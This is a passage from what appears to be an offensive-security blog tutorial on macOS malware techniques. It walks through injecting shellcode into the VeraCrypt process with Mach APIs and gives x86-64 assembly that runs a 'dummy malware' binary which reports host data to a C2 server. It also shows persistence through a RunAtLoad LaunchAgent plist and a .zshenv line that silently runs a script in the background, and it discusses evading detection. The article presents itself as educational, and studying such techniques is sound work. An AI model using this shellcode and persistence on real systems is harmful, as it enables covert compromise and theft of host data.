In our injector, we’re injecting shellcode into a target process using Mach APIs in macOS. Now, one significant difference between POSIX threads and Mach threads comes into play here. POSIX threads utilize the thread local storage (TLS) data structure, which is crucial for managing thread-specific data. However, Mach threads don’t have this concept of TLS.

Now, when we inject our shellcode into the target process and create a remote thread to execute it, we can’t simply point the instruction pointer in the thread context struct and expect everything to work smoothly. Why? Because our shellcode, which is essentially unmanaged code, needs to run in a controlled environment, and transitioning from a Mach thread directly to executing our shellcode might cause issues.

So, to prevent potential crashes or errors, we need to ensure that our shellcode is executed within the context of a fully-fledged POSIX thread. This means that as part of our injection process, we have to somehow promote our shellcode from being executed within the context of a base Mach thread to being executed within the context of a POSIX thread. By doing this, we create a more stable environment for our shellcode to execute, ensuring that when the target process resumes its execution at the start of our shellcode, it does so without any issues. This promotion process is essential for the successful execution of our injected shellcode in user mode without causing crashes or unexpected behavior.

As you can see, we injected our shellcode into the Veracrypt process successfully. The message “Hello World!” was printed, confirming that the shellcode executed as expected and produced the desired output.

However, let’s shift our focus now. Remember the code we previously developed to transmit system data to the C2 server? What if we inject shellcode into the Veracrypt process to execute our dummy malware, enabling it to establish communication with the C2 server and transmit host data?

To execute a shell command, considering I’m running zsh, we need to trigger a syscall to run /bin/zsh -c. For this, we need to utilize execve. What does this do? Simply put, it executes the program referenced by _pathname, which in our case will be the path to our dummy malware executable.

Alright, let’s proceed by writing a simple assembly code to execute /bin/zsh -c '/Users/foo/dummy'. First, we’ll set up a register (rbx) and load the string '/bin/zsh' into it. Once this string is pushed onto the stack, we’ll proceed to load the ASCII values for -c into the lower 16 bits of the rax register. After pushing this -c flag onto the stack, we’ll set the rbx register to point to the -c flag on the stack, as it will be necessary later during the syscall preparation.

Any additional details will be described in comments within the code. At the end of this section, there’s an indirect jump facilitating the execution of subsequent instructions. This jump redirects the program flow to the address stored in the exec subroutine, ensuring the continuity of execution.

global _main

_main:
    xor rdx, rdx        ; Clear rdx register
    push rdx            ; Push NULL onto stack (String terminator)
    mov rbx, '/bin/zsh' ; Load '/bin/zsh' into rbx
    push rbx            ; Push '/bin/zsh' onto stack
    mov rdi, rsp        ; Set rdi to point to '/bin/zsh\0'
    xor rax, rax        ; Clear rax register
    mov ax, 0x632D      ; Load "-c" into lower 16 bits of rax
    push rax            ; Push "-c" onto stack
    mov rbx, rsp        ; Set rbx to point to "-c"
    push rdx            ; Push NULL onto stack
    jmp short dummy     ; Jump to label dummy

exec:
    push rbx            ; Push "-c" onto stack
    push rdi            ; Push '/bin/zsh' onto stack
    mov rsi, rsp        ; Set RSI to point to stack
    push 59             ; Push syscall number
    pop rax             ; Pop syscall number into rax
    bts rax, 25         ; Set 25th bit of rax (AT_FDCWD flag)
    syscall             ; Invoke syscall

dummy:
    call exec                   ; Call subroutine exec
    db '/Users/foo/dummy_m', 0  ; Define string
    push rdx                    ; Push NULL onto stack

Alright, it’s time to try this beauty. As usual, we’ll need to extract the shellcode and test it before using it. And just like that, bingo! We’ve successfully injected our shellcode, triggering our dummy malware. We’re now receiving host information in the C2 server. We can push this further by exploring additional capabilities and attack vectors, even achieve persistence, but I think that’s enough for now.

Executing and sending host information essentially does nothing harmful to your computer. “Dummy” is more about demonstrating how malware can be triggered and how it uses injection techniques to spread. It’s also interesting for defensive evasion or adding backdoor capabilities. This was just a quick look at the Mach API, covering system calls and code injection techniques, and how an attacker can utilize something like process injection to achieve malicious behavior. In this example, we’ve used a legitimate process to inject and execute “malicious code,” potentially exposing host data to an attacker. This can be pushed further, but we’re here just to learn, and I encourage you to experiment with caution. Code injection must be used with care.

I hope you’ve learned something from this simple introduction, and there’s a lot more to explore beyond what we’ve touched on here. All the code used here can be found at Github

Persistence

To keep things simpler, let’s focus on Userland Persistence. I’ll start by describing some well-known persistence techniques and a few lesser-known ones, so you can get a good grasp of how these methods work and how malware might use them.

Before writing this article, I looked at various samples targeting macOS and reviewed some threat reports. One thing that stood out is that launch agents and launch daemons are by far the most common methods for persistence. Why? Because they’re simple and flexible kind of like the startup folder persistence on Windows. However, detecting these techniques is relatively easy. Remember LOLBins? These methods are similarly straightforward and common, and their detection methods are well-established too.

LaunchAgent & LaunchDaemon

LaunchAgents and LaunchDaemons are key components of macOS, responsible for managing processes automatically. LaunchAgents are typically located in the ~/Library/LaunchAgents directory for user-specific tasks, triggering actions when a user logs in. On the flip side, LaunchDaemons are situated in /Library/LaunchDaemons, initiating tasks upon system startup.

Although LaunchAgents primarily operate within user sessions, they can also be found in system directories like /System/Library/LaunchAgents. However, modifying these files would require disabling System Integrity Protection (SIP), which is not recommended due to potential security risks. In contrast, LaunchDaemons, operating at a system level, require administrator privileges for installation and typically reside in /Library/LaunchDaemons.

Both LaunchAgents and LaunchDaemons are configured using .plist files, specifying commands or referencing executable files for execution.

LaunchAgents are suitable for tasks requiring user interaction, while LaunchDaemons are better suited for background processes. Let’s take a LaunchAgents example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.pre.foo.plist</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/foo/dummy</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

So, what does this all mean? Essentially, if we want our binary to run every time a user logs into the system, we simply instruct launchd to manage it. It’s pretty straightforward, right?

Bash Profiles & Zsh Startup

LLet’s talk about bash profiles on Linux systems. These are scripts with commands that run whenever you open a terminal. In zsh, which is an alternative shell, there are similar files called start files that serve the same purpose. But here’s the twist: zsh also includes an extra file called the zsh environment file. This file is even more powerful because it activates more frequently, ensuring persistence across various interactions with zsh.

The cool thing is that even if you just type in a command like zsh -c, this shell environment file still gets sourced. This means your persistence setup remains strong, no matter how you’re using shell.

~ > cat .zshenv
. "/Users/foo/startup.sh" > /dev/null 2>&1&

Now, every time you open a terminal and Z shell initializes, it will automatically execute the startup.sh script, ensuring that your desired commands or actions are performed consistently.

Now, to execute it in the background, we use setopt NO_MONITOR. This command disables job monitoring and then runs the startup.sh script in the background. As a result, the script runs every time you open a terminal with Z shell, but it runs silently in the background.

So, you get the idea, right? These are some of the common techniques I’ve seen, especially in sample analysis. There are others, like Cron jobs and Dock shortcuts, but honestly, if I were writing something specifically for macOS, I’d go for a multi-stage approach and avoid any well-known methods. Once a technique becomes public, it’s pretty much compromised. So, I’d aim to develop something with a longer lifespan.

Conclusion

Usually, at this point in the article, I’d include a section where we build a simple piece of malware to put everything we’ve covered into practice. However, after some thought, adding more code might make things drag on and become a bit confusing. Since we’ve already gone over code injection pretty thoroughly, we’ll save the more advanced stuff for later.

In conclusion, I hope you’ve enjoyed and learned from this article. We covered a lot about macOS architecture and APIs, even though we only touched on the basics. By exploring various techniques and writing simple code with the Mach API, with key concepts like code injection and persistence techniques, and saw some macOS syscalls in action. Until next time!

References